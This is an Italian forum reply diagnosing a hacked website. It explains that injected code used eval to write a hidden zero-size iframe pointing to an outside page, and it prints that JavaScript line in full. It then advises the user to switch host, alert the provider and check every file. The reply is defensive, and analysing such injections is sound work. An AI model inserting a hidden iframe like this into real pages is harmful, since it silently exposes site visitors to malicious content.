- per primo il titolo è infinitamente vado e non c'entra NULLA con php ...

- per secondo è vietato postare nomi di hoster

- per terzo ... un consiglio spassionato ... cambia hosting, al 90% hanno bucato il server il codice che hai trovato faceva eseguire questa riga di javascript tramite eval:
document.write('<iframe src="http://www.car8au.com/or.html" height=0 width=0 border=0>')

ovvero inseriva un'iframe nascosto nella tua pagina che rimandava all'indirizzo http://www.car8au.com/or.html (pagina che è stata prontamente eliminata)

cmq probabilmente un bot è passato e ha fatto la modifica alle pagine usando un'exploit standard o magari è stato qualcuno che non aveva nulla da fare

sta di fatto che il server è stato bucato (o il tuo account questo non so) e che quindi a parte fai notare la cosa al provider, ti consiglio di esaminare pagina per pagina TUTTO ciò che hai sul server e di reinstallare quello che puoi

ciao